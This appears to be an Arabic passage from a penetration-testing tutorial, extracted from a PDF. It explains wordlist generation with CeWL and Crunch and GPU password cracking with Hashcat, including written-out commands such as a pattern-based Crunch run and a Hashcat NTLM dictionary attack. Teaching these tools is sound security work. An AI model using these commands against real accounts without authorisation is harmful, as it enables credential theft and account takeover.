دﻋﻧﺎ ﻧﻧظر أوﻻ إﻟﻰ ﻣﻌﻠوﻣﺎت اﻻﺳﺗﺧدام اﻟﺗﻲ ﺗﻘدﻣﮭﺎ ،CeWLوﺑﻌد ذﻟك ﺳوف ﻧظﮭر ﻟك ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮫ .وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ:
اﻓﺗراﺿﯾﺎ CeWL ،ﺗﻘوم ﺑﺟﻣﻊ اﻟﻛﻠﻣﺎت ذات 3أﺣرف أو أﻛﺛر ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟذي ﺣددﺗﮫ وﺳوف ﺗذھب إﻟﻰ ﻋﻣﻖ ﻣﺳﺗوﯾن ﻣن اﻟوﺻﻼت
اﻟﺧﺎرﺟﯾﺔ ﺑﺎﺳﺗﺧدام أﺳﻠوب اﻟﻌﻧﻛﺑوت )ﻣﺛل اﻟذي ﺗﺳﺗﺧدﻣﮫ ﻣواﻗﻊ اﻟﺑﺣث ﻣﺛل ﺟوﺟل ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺑﺣث( ،وﯾﻣﻛن ﺗﻐﯾﯾر ھذا اﻟﺳﻠوك ﻋن طرﯾﻖ
ﺗﻣرﯾر اﻟﻣﻌﺎﻣﻼت .ﻛن ﺣذرا ﻋﻧد ﺗﻐﯾر ھده اﻟﻣﻌﺎﻣﻼت ﺣﯾث إذا وﺿﻌﺗﮭم اﻟﻰ ﻋﻣﻖ ﻛﺑﯾر واﻟﺳﻣﺎح ﻟﮫ ﺑﺎﻟذھﺎب ﺑﻌﯾدا ،ﻓﻘد ﯾﻧﺗﮭﻲ ﺑك اﻟﻣطﺎف اﻟﻰ
اﻻﻧﺟراف إﻟﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﺟﺎﻻت اﻷﺧرى .ﺟﻣﯾﻊ اﻟﻛﻠﻣﺎت ذات اﻟﺛﻼﺛﺔ أﺣرف وأﻛﺛر ﺗﻛون ﻧﺎﺗﺞ اﻹﺧراج .ﯾﻣﻛن زﯾﺎدة طول اﻟﻛﻠﻣﺔ وﯾﻣﻛن
أﯾﺿﺎ ﻛﺗﺎﺑﺔ اﻟﻛﻠﻣﺎت إﻟﻰ ﻣﻠف ﺑدﻻ ﻣن اﻟﺷﺎﺷﺔ.
#cewl [OPTION] ... URL
#cewl -w passwords.txt http://www.digininja.org/projects/cewl.php
Crunch
Crunchھﻲ أداة ﻗوﯾﮫ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺧﺎﺻﺔ ﺑك واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ﺗطﺑﯾﻘﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور.
ﻟﻠوﺻول اﻟﻰ ﺻﻔﺣﺎت اﻟﻣﺳﺎﻋدة اﻟﺧﺎﺻﺔ ب ،Crunchوذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ:
#man crunch
ﻓﻲ اﻷﺳﺎس ﻛل ﻣﺎ ﻧﺣﺗﺎج إﻟﯾﮫ ﻟﺗﺷﻐﯾل Crunchھو ﺗﺣدﯾد اﻟﺣد اﻷدﻧﻰ واﻟﺣد اﻷﻗﺻﻰ ﻟﻠطول وﻧوع اﻷﺣرف اﻟﻣﺳﺗﺧدﻣﺔ .أﯾﺿﺎ crunch
ﯾﻌﺗﻣد ﺑﻛﺛره ﻋﻠﻰ اﺳﺗﺧدام اﻟﻣﻠف charset.lstاﻟﻣوﺟود ﻓﻲ ﻣﺳﺎر اﻟﺗﺛﺑﯾت ] [/etc/share/crunchﺣﯾث ان ھذا اﻟﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ
اﻟﻘواﻋد اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻓﻲ ﺗوﻟﯾد اﻟﻘواﻣﯾس .ﻟذﻟك ﺳوف ﻧﺣﺗﺎج إﻣﺎ إﻟﻰ ﺗﺷﻐﯾل crunchﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر أو اﻹﺷﺎرة إﻟﻰ ھذا
اﻟﻣﺳﺎر ﻣﻊ اﺳﺗﺧدام اﻟﺗﻌﺑﯾر )(-fوذﻟك ﻋﻧد اﺳﺗﺧدام ﻣﺟﻣوﻋﺎت اﻷﺣرف اﻷﻛﺛر ﺗﻘدﻣﺎ.
ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﺗوﻟﯾد اﻟﻛﻠﻣﺎت ﻧﻘوم ﺑﺎﻟﺗﻌدﯾل ﻋﻠﻰ ﻣﻠف اﻟﻘواﻋد charset.lstﺑﻣﺣرر اﻟﻧﺻوص اﻟﻣﻔﺿل ﻟدﯾك ﺳوف ﺗﺟد ﺑداﺧل اﻟﻣﻠف اﻟﻌدﯾد ﻣن
اﻟﻘواﻋد اﻻﻓﺗراﺿﯾﺔ ﻣﻊ اﻟﺑرﻧﺎﻣﺞ وﺑﺟﺎﻧب ﻛل ﻗﺎﻋدة اﻟﻣﺣﺎرف اﻟﺗﻲ ﺳوف ﯾﺗﻛون ﻣﻧﮭﺎ اﻟﻘﺎﻣوس إذا اردت اﺳﺗﺧدام ﻣﺣﺎرف ﻣﻌﯾﻧﮫ ﺗﺧﺗﺎرھﺎ اﻧت
ﻋﻠﯾك ﺑﺈﻧﺷﺎء ﻗﺎﻋده ﺟدﯾده ﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻘﺎﻋدة واﻟﻣﺣﺎرف اﻟﺗﻲ ﺗرﯾدھﺎ ان ﺗﻛون ھﻲ اﻟﻘﺎﻣوس ﻛﻣﺎ ھو ﻣوﺿﺢ ﺑﺎﻟﺻورة
اﻟﺗﺎﻟﯾﺔ:
دﻋوﻧﺎ ﻧﺑدأ ﺑﺎﺳﺗﺧدام اﻷداة crunchﻣﻊ اﺑﺳط اﺳﺗﺧدام ﻟﮭﺎ ﻋن طرﯾﻖ اﻻﺗﻲ:
ﺣﯾث ﯾﻣﺛل اﻟﻘﯾﻣﺔ 1طول أول واﻗل ﻛﻠﻣﺔ ﻓﻲ اﻟﻘﺎﻣوس واﻟﻘﯾﻣﺔ 3ﺗﻣﺛل طول اﺧر ﻛﻠﻣﮫ ﻓﻲ اﻟﻘﺎﻣوس .وﻧﺎﺗﺞ ھذا اﻻﻣر ﺳوف ﯾﻛون ﻛﻠﻣﺎت
ﻣرﻛﺑﺔ ﻣن ﺣرف إﻟﻰ ﺛﻼﺛﺔ أﺣرف ﺗﺷﺗﻣل ﻋﻠﻰ ﻛل اﻷﺣرف اﻟﻼﺗﯾﻧﯾﺔ اﻟﺻﻐﯾرة ﺷﯾﺋﺎ ﻣن ھذا اﻟﻘﺑﯾل:
…a, b, c, d, e, f, g, h, i, j, etc
…aa, ab, ac, ad, ae, af, ag, ah, ai, aj, etc
…aaa, aab, aac, aad, aae, aaf, aag, aah, aai, aaj, etc
ﻣن ھذا اﻟﻣﺛﺎل ﻧﺟد ان crunchﻓﻲ اﻷﺳﺎس ﯾﺑدا ﻣﻊ ﺣرف واﺣد وھو aﺛم ﯾﺳﺗﻣر ﻣن ﺧﻼل ﺟﻣﯾﻊ اﻟﻣﺣﺎرف اﻟﻣﺳﺗﺧدﻣﺔ ﺣﺗﻰ ﯾﺻل اﻟﻰ
اﻟﺣرف .zzz
ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﺳوف ﻧﺣﺎول إﻧﺷﺎء ﺑﻌض ﻣن اﻟﻘواﺋم اﻷﻛﺛر ﺗﻌﻘﯾدا ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻣﻊ crunchﻛﺎﻻﺗﻰ:
ﻓﻲ ھذا اﻟﻣﺛﺎل اﺳﺗﺧدﻣﻧﺎ ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف اﻟﺗﻲ ﻧرﯾد ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ ،واﻟﺗﻲ ﻛﺎﻧت .abcde1234واﻟﺗﻲ ﺳوف ﺗؤدى اﻟﻰ اﻧﺷﺎء
ﻣﻠف ﻛﻠﻣﺎت ﻋﺑﺎره ﻋن ﻛﻠﻣﺎت ﻣن ﺛﻼﺛﺔ ﻗﯾم وأرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﺔ ﻣن اﻷﺣرف اﻟﻣذﻛورة وﻓﻰ ﻣﺛﺎﻟﻧﺎ ھﻧﺎ ﻣﺛل aa1و bb3و .a212ﺣﯾث ﺗﺑدأ ب
aaaوﺗﻧﺗﮭﻲ ب .4444
ﯾﻣﻛﻧﻧﺎ أﯾﺿﺎ اﺳﺗﺧدام ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف ﻋن طرﯾﻖ اﻻﺳﺗﻌﺎﻧﺔ ﺑﺎﻟﻣﻠف charset.lstاﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﻌظم اﻟﺗﺷﻛﯾﻼت اﻟﻣﻣﻛﻧﺔ ﻣن
اﻷﺣرف أو اﻻرﻗﺎم اﻟﺗﻲ ﻧرﯾد ﺑﮭﺎ ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ ،وھذا اﻟﻣﻠف ﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر /usr/share/crunch/ﻓﻧذﻛره ﻣﻊ ﻣﺳﺎره ﺛم اﺳم
اﻟﺗﺷﻛﯾﻠﺔ ﻋﻧد اﺳﺗﺧداﻣﮫ ﻣﻊ اﻟﺗطﺑﯾﻖ .crunchوﻟﻣﻌرﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﻣﺗﺎﺣﺔ واﺳﻣﺎءھﺎ ﻧذھب إﻟﻰ اﻟﻣﻠف اﻟﻣذﻛور وﻧﺧﺗر ﻣﻧﮭﺎ ﻣﺎ ﻧرﯾد وﯾﻣﻛﻧك
أﯾﺿﺎ إﺿﺎﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﺗﻲ ﺗرﯾدھﺎ ﻛﻣﺎ ذﻛرﻧﺎ ﻣن ﻗﺑل.
ﺣﯾث ﻗﻣﻧﺎ ﻓﻲ ھذا اﻟﻣﺛﺎل ﺑﺈﻧﺷﺎء ﻗواﺋم ﻛﻠﻣﺎت ﻣﻛون ﻣن ﺛﻼﺛﺔ ﻗﯾم اﻟﻰ أرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﮫ ﻣن اﻷﺣرف اﻟﻣذﻛورة ﻓﻲ اﻟﻣﻠف charset.lstﺗﺣت
ﺑﻧد hex-lowerواﻟﺗﻲ ﺗﻌﻧﻰ اﻟﻘﯾم اﻷﺗﯾﺔ 0123456789abcdefﺣﯾث ﺗﺑدأ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ب 000وﺗﻧﺗﮭﻲ ب .ffff
اﯾﺿﺎ ﺗﺳﺗطﯾﻊ ﻋﻣل ﻗﺎﻣوس ﺑﺧﺎﻧﺎت ﻣﻌﻠوﻣﺔ ﻣﺳﺑﻘﺎ ﺑواﺳطﺔ اﻟﺧﯾﺎر tﻣﺛﻼ ارﯾد ﻗﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﺧﻣس ﺧﺎﻧﺎت ﺗﻛون اﻟﺧﺎﻧﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺛﺎﻟﺛﺔ
واﻟراﺑﻌﺔ ﻣﻌﻠوﻣﺔ واﻟﺑﻘﯾﮫ ﻏﯾر ﻣﻌﻠوﻣﺔ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺗﮭﺎ ﺑﺎﻟﺻﯾﻐﺔ اﻟﺗﺎﻟﯾﺔ %123%ﺟﻣﯾﻊ اﻟﺧﺎﻧﺎت ﻏﯾر ﻣﻌروﻓﮫ ﻣﺎ ﻋدا اﻟﺗﻲ ﻗﻣﻧﺎ ﺑﻛﺗﺎﺑﺗﮭﺎ.
وﯾﺟب ان ﻧﻧﺗﺑﮫ ﺣﯾث اﻧﮫ ﻣﻊ ھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﺑﻌض اﻟﺗﻌﺑﯾرات اﻟﻣﺣددة ﻛﺎﻻﺗﻰ:
ﺣﯾث ﯾرﻣز إﻟﻰ اﻟﺣرف اﻟﺻﻐﯾر ﺑﺎﻟرﻣز"@" وإﻟﻰ اﻟﺣرف اﻟﻛﺑﯾر ﺑﺎﻟرﻣز" ",وإﻟﻰ اﻟرﻗم ﺑﺎﻟرﻣز " "%وإﻟﻰ اﻟرﻣوز symbolsﺑﺎﻟرﻣز "^"
@: Inserts lowercase characters
%: Inserts numbers
,: Inserts uppercase characters
^: Inserts symbols
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻓﺈﻧﻧﺎ ﻧﻔﺗرض أﻧﻧﺎ ﻧﻌرف اﺳﺗﺧداﻣﺎت ھدﻓﻧﺎ ﺣﯾث ﯾﺳﺗﺧدم اﻟﻛﻠﻣﺔ passوﻟﻛن ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم اﻟﻐﯾر اﻟﻣﻌروﻓﺔ ﻓﻲ ﻛﻠﻣﺔ
اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم .ﻟﺗﺷﻐﯾل crunchﻟﻌﻣل ﻗﺎﺋﻣﺔ ﺑﻛﻠﻣﺎت ﻣرور ﻋﺑﺎره ﻋن ﺳﺗﺔ أﺣرف وﺗﻛون ﻋﺑﺎره ﻋن passﺛم ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم
اﻟﻣﺟﮭوﻟﺔ ،وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدم %%ﻟﺗﻣﺛﯾل أي رﻗم .ﻟﺗﺷﻐﯾل ھذا ووﺿﻊ اﻟﻧﺎﺗﺞ ﻓﻲ ﻣﻠف ﻧﺻﻲ ﯾدﻋﻰ ،newpasslist.txtﻛﺎﻻﺗﻰ:
#crunch 6 6 –t pass%% -o newpasslist.txt
ﺳوف ﯾﺣﺗوي اﻟﻣﻠف ﻧﺻﻲ اﻟﻧﺎﺗﺞ ﻣن اﻻﻣر crunchﻛﺎﻓﺔ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ .ﺗظﮭر اﻟﺻورة اﻟﺗﺎﻟﯾﺔ اﻟﺟزء اﻟﻌﻠوي ﻣن ﻣﻠف اﻹﺧراج:
ﻣﻼﺣظﺔ :اﻟﺧﯾﺎر tﻻ ﯾﺳﺗﺧدم اﻻ ﻋﻧد اﺧﺗﯾﺎر ﺧﺎﻧﺎت ﺛﺎﺑﺗﮫ ﻣﺛل ﺧﻣس ﺧﺎﻧﺎت او ﻋﺷر ﺧﺎﻧﺎت او ﺳﺑﻊ ﺧﺎﻧﺎت ﻟﯾس ﻣن واﺣد اﻟﻰ ﺳﺑﻌﮫ اي
ﺗﻛون ﺟﻣﯾﻌﮭﺎ ﺳﺑﻊ ﺧﺎﻧﺎت ﻻ ﯾﺑدا ﻣن ﺧﺎﻧﮫ ﺻﻐرى أﺻﻐر ﻣن اﻟﻣذﻛورة ﻓﻲ اﻟﺧﯾﺎر .t
اﻟﻣﺻدرhttp://hashcat.net/wiki :
ﺣﺗﻰ اﻵن ﻗﻣﻧﺎ ﺑﺗﻐطﯾﺔ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت ﻟﻣﮭﺎﺟﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور .رأﯾﻧﺎ أﻧﮫ ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ﻣﺎ ﯾﻣﻛﻧك أن ﺗﻔﻌﻠﮫ ﺑﻣﺟرد اﻟﺑﺣث ﻓﻲ
،rainbow tableوﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﯾﻣﻛﻧك ﺗﻣرﯾر اﻟﮭﺎش ).(pass the hash
وﻟﻛن اﻟﻛﺛﯾر ﯾﻌﺎﻧﻲ ﻣن ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﻣﺷﺎﻛل اﻟﻛﺛﯾرة اﻣﺎ ﻟﺻﻌوﺑﺔ اﻟﻛﻠﻣﺔ او أن ﻋﻣﻠﯾﺔ اﻟﻛﺳر ﺑطﯾﺋﺔ او اﻟﻛﺛﯾر ﻣن اﻷﺳﺑﺎب
اﻷﺧرى .ﻟذﻟك ﺳﻧﺗطرق اﻟﯾوم اﻟﻰ اﺣدى اﻟطرق اﻟﻣﺗﻘدﻣﺔ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﺗﻲ ﺗﺟﻌل اﻟﻛﺳر أﺳﮭل وأﺳرع ﺑﻛﺛﯾر ﻣن اﻟطرق اﻟﺗﻘﻠﯾدﯾﺔ
واﻟﺗﻲ ﺗﺻل ﺳرﻋﺗﮭﺎ اﻟﻰ أﻛﺛر ﻣن 10ﻣﻠﯾون ﻣﺣﺎوﻟﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ .ﻟك ان ﺗﺗﺧﯾل ﺳرﻋﺗﮫ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة واﻟﺗﻲ ﺗﺻل ﻟﻌدة دﻗﺎﺋﻖ
ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ CUDAوﻟﻛن ﻣﺎ ﻣﻌﻧﻰ CUDA؟
ھﻲ اﺧﺗﺻﺎر ل Compute Unified Device Architectureھﻲ ﻋﺑﺎرة ﻋن ﻣﻧﺻﺔ اﻟﺣوﺳﺑﺔ اﻟﻣﺗوازﯾﺔ اﻟﺗﻲ ﯾزﯾد أداء
اﻟﺣوﺳﺑﺔ ﻋن طرﯾﻖ ﺗﺳﺧﯾر ﻗوة ) GPUوﺣدات اﻟﻣﻌﺎﻟﺟﺔ ﻓﻲ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ ﺗﺳرع ﻣن اﻟﻌﻣﻠﯾﺎت ﺑﺷﻛل ﻛﺑﯾر ﺗم ﺗطوﯾرھﺎ ﻋن طرﯾﻖ
ﺷرﻛﺔ .(NVidiaوﻣﻊ ﻣرور اﻟوﻗت ،ازداد ﻗوة اﻟﻣﻌﺎﻟﺟﺔ GPUﺑﺷﻛل ﻛﺑﯾر ﻣﻣﺎ ﯾﺗﯾﺢ ﻟﻧﺎ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧداﻣﮭﺎ ﻟﻸﻏراض اﻟﺣﺳﺎﺑﯾﺔ ﻟدﯾﻧﺎ
وﻟﻸﻏراض اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ.
CUDA Cracking
ھﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام ﻣوارد ﻛﺎرت اﻟﺷﺎﺷﺔ وھﻲ أﺳرع ﻋﺷرات اﻷﺿﻌﺎف ﻣن ﺳرﻋﺔ .CPUﯾﺟب ان ﯾدﻋم ﻛﺎرت اﻟﺷﺑﻛﺔ
ﻟدﯾك ﺗﻘﻧﯾﺔ CUDAأوﻻ .ﻛﻠﻣﺎ ذاد ﻋدد CUDA coresﻛﻠﻣﺎ ﻛﺎن اﻷداء اﻗوى وأﺳرع.
ﺳﻧﺳﺗﺧدم ﻓﻲ ھذا اﻟﺟزء اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﻧدرﺟﺔ ﺟﻣﯾﻌﮭﺎ ﺗﺣت اﻷداة Hashcatﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﺳواء ﻟوﯾﻧدوز او ﻟﻠﯾﻧﻛس.
Hashcatو oclHashcatھﻲ ادوات ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل ﻛل ﻣن ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺎت اﻟرﺳوم ) (GPUاو وﺣدة اﻟﻣﻌﺎﻟﺟﺔ
اﻟﻣرﻛزﯾﺔ ) (CPUاﻟﺧﺎص ﺑك OclHashcat .ھو ﻧﺳﺧﺔ GPGPUbasedأي اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺔ اﻟرﺳوم اﻟﺧﺎص ﺑك
) (GPUوﻛﺎﻧت ﺗﺳﻣﻰ ھﻛذا ﻗدﯾﻣﺎ أﻣﺎ اﻻن ﻓﺄﺻﺑﺣت ﺗﺳﻣﻰ OclHashcat-plusاو CUDAHashcat-plusﻋﻠﻰ ﺣﺳب ﻧوع ﻛﺎرت
اﻟﺷﺎﺷﺔ اﻟﻣﺳﺗﺧدم واﻟﺗﻲ ﺗﻛون اﺳرع ﺑﻛﺛﯾر ﻣن Hashcatاﻟذى ﯾﻌﺗﻣد ﻓﻘط ﻋﻠﻰ Hashcat/oclHashcat .CPUھﻲ أدوات ﻣﺗﻌددة
اﻟﻌﻣﻠﯾﺎت ) (Multi Threatingاﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ اﻟﺗﻌﺎﻣل ﻣﻊ ھﺎش ﻣﺗﻌدد وﻗواﺋم ﻛﻠﻣﺎت ﻣﺗﻌددة ﺧﻼل ﺟﻠﺳﺔ ھﺟوم واﺣده .وذﻟك ﻻن وﺣدة
اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻌدﯾد ﻣن اﻟﻣواﺿﯾﻊ ،واﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ .وﻟﻛن اﻟﺳرﻋﺔ اﻟﺣﻘﯾﻘﯾﺔ ﯾﺄﺗﻲ دوره ﻋﻧد اﺳﺗﺧدام
ﻗوة .GPUإذا GPUاﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻣﺋﺎت ﻣن اﻟﻣواﺿﯾﻊ ،ﯾﺗم اﺳﺗﺧدام ﻛل ھذه اﻟﻘوة ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر .ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺳﺧﯾر
ﻗوة وﺣدات ﻣﻌﺎﻟﺟﺔ اﻟرﺳوﻣﺎت ﻟﺑطﺎﻗﺎت ﻓﯾدﯾو ﻣﺗﻌددة ﻹﻧﺷﺎء ﻣﺣطﺔ ﻗوﯾﺔ ﺟدا ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور.
Hashcat/oclHashcatﺗﻘدم اﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﮭﺟوم ،ﻛﺎﻻﺗﻲ:
ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻠ Hashcatواﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﻣن ﺧﻼل اﻻﺗﻲ:
ﻧﺣن اﻻن ﺳوف ﻧذھب ﻟﺗﺷﻐﯾل ، Hashcatوﻟﻛﻧﻧﺎ ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻋدد ﻗﻠﯾل ﻣن اﻷﺷﯾﺎء .ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻣﺎ ﻧوع اﻟﮭﺎش اﻟذي ﻧﺳﺗﺧدﻣﮫ،
واﺳم اﻟﻣﻠف اﻟﮭﺎش ،اﺳم ﻣﻠف اﻟﻘﺎﻣوس وأﺧﯾرا اﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ ﻟﺗﺧزﯾن ﻧﺎﺗﺞ ﻛﺳر اﻟﮭﺎش ﺑﮫ.
ﯾﻣﻛﻧك ان ﺗرى اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﻓﺗﺢ ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ "."hashcat --help
ﻧﻘوم اﻻن ﺑﻔﺗﺢ ﻧﺎﺗﺞ اﻻﻣر hashcatواﻟذي ﺗم ﺗﺳﺟﯾﻠﮫ ﻓﻲ اﻟﻣﻠف cracked.txtﻟﻧرى ﻣﺎ ﻗﺎﻣت ﺑﮫ اﻷداة ﻣن ﻛﺳر اﻟﮭﺎش -
وﺗرﺟﻣﺗﮫ اﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻓﻲ ﻧص ﻏﯾر ﻣﺷﻔر.
ﻛﻣﺎ ﺗرى ،ﻓﻠﻘد ﺗم ﻛﺳر 13ﻛﻠﻣﺎت ﻣرور ﻓﻲ ﺣواﻟﻲ ﺛﺎﻧﯾﺔ وﻧﺻف .ﻓﻠﻧﻠﻘﻲ ﻧظرة ﻓﺎﺣﺻﺔ ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور ھذه ﻧﺟدھﺎ ﻣن أﻛﺛر -
اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﻓﻲ ﻋﺎم .2012ﻋن طرﯾﻖ اﺳﺗﺧدام أي ﻣن ھذه اﻟﻛﻠﻣﺎت ﻓﺈﻧﮭﺎ ﻟن ﺗﺻﻣد أﻣﺎم أي أداة ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور
ﻷﻛﺛر ﻣن ﺟزء ﻣن اﻟﺛﺎﻧﯾﺔ.
دﻋوﻧﺎ ﻧﻠﻘﻲ ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب ﻣﻣﺎ ﺳﺑﻖ ﻣﻊ .Hashcatوﻟﯾﻛن ﻣﺛﻼ ﻣﺛل اﻻﺗﻲ: -
ﻧﻼﺣظ ھﻧﺎ اﻧﮭﺎ اﺧذت ﻣن اﻟوﻗت ﻣﻘدار 4ﺛواﻧﻲ .وﻗﺎﻣت ﺑﻛﺳر اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻓﻘط ﻣن أﺻل ﺧﻣﺳﮫ. -
-ﻋﻧد ﻋدم اﻟﻧﺟﺎح ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻧﺣﺎول اﺳﺗﺧدام ﻣﻠف ﻗﺎﻣوس أﻛﺑر.
-ﻓﻠﻧﺣﺎول ﺗﺣﻣﯾل ھذا اﻟﻘﺎﻣوس ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ اﻟذي ﺳوف ﯾزﯾد ﻋن 5ﺟﯾﺟﺎ.
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
-ﺛم ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل وﻧﺳﺗﺧدم اﻻﻣر اﻟﺗﺎﻟﻲ:
#hashcat -m 1000 hash.txt crackstation.txt -o hardcracked.txt --remove
ﻧﻼﺣظ ھﻧﺎ وﺟود ﺗﻐﯾرﯾن ﻋن اﻻﻣر اﻟﺳﺎﺑﻖ ،أوﻻ ﻗﻣﻧﺎ ﺑﺗﻐﯾر اﻟﻘﺎﻣوس اﻟﻣﺳﺗﺧدم ﻣن rockyou.txtاﻟﻰ crackstation.txtاﻟذي ﻗﻣﻧﺎ
ﺑﺗﺣﻣﯾﻠﮫ .ﺛﺎﻧﯾﺎ ﻗﻣﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر --removeوھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﻣﻊ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﻌﻣﻼﻗﺔ ﺣﯾث اﻧﮫ ﺳوف ﯾزﯾل اﻟﻛﻠﻣﺎت اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش
اﻟدى ﺗم ﻛﺳره ،ھذا اﻟﺧﯾﺎر ﻏﯾر ﻣﮭﻣﮫ ﻓﻲ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﺻﻐﯾرة.
-ﻣﻊ ﺑﻌض ﻣن اﻟوﻗت ﺳوف ﯾﻛون اﻟﻧﺎﺗﺞ ﻛﺎﻻﺗﻰ:
ﻧﺟد اﻧﮫ اﺧذ ﻣﻘدار ﻣن اﻟوﻗت ﯾﻌﺎدل 11دﻗﯾﻘﮫ وﻗﺎم ھﻧﺎ ﺑﻛﺳر ﺛﻼﺛﺔ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن أﺻل ﺧﻣﺳﮫ وﻟﻛن ﻧﻼﺣظ اﻧﮫ -
ﻣﺎزال ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻟم ﯾﺗم ﻛﺳرھﻣﺎ ﺣﺗﻰ اﻻن.
